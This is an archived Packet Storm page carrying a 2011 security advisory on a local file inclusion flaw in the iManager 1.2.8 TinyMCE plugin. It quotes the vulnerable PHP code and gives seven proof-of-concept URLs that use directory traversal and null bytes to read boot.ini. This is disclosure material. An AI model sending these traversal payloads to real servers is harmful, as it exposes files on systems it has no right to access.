what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iManager Plugin 1.2.8 Local File Inclusion

iManager Plugin 1.2.8 Local File Inclusion
Posted Sep 17, 2011
Authored by LiquidWorm | Site zeroscience.mk

iManager plugin version 1.2.8 suffers from a local file inclusion vulnerability / file disclosure vulnerability when input passed thru the 'lang' parameter to imanager.php, rfiles.php, symbols.php, colorpicker.php, loadmsg.php, ov_rfiles.php and examples.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

tags | exploit, local, php, file inclusion
SHA-256 | d0cf4e6a0566ee44420d01dd97fde3f21f7a6d484e9d9448f4b1f6a0c32cc43c

iManager Plugin 1.2.8 Local File Inclusion

Change Mirror Download

iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability


Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.2.8 Build 02012008

Summary: With iManager you can manage your files/images on your webserver,
and it provides user interface to most of the phpThumb() functions. It works
either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,
htmlAREA, Xinha and FCKeditor.

Desc: iManager suffers from a file inlcusion vulnerability (LFI) / file
disclosure vulnerability (FD) when input passed thru the 'lang' parameter
to imanager.php, rfiles.php, symbols.php, colorpicker.php, loadmsg.php,
ov_rfiles.php and examples.php is not properly verified before being used
to include files. This can be exploited to include files from local resources
with directory traversal attacks and URL encoded NULL bytes.


======================================================================
/langs/lang.class.php:
----------------------------------------------------------------------

67: function loadData() {
68: global $cfg;
69: include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
70: $this -> charset = $lang_charset;
71: $this -> dir = $lang_direction;
72: $this -> lang_data = $lang_data;
73: unset( $lang_data );
74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
75: $this -> default_lang_data = $lang_data;
76: }

======================================================================


Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com


Advisory ID: ZSL-2011-5042
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5042.php


15.09.2011

--

http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/imanager.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/colorpicker.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/ov_rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/images/examples/examples.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close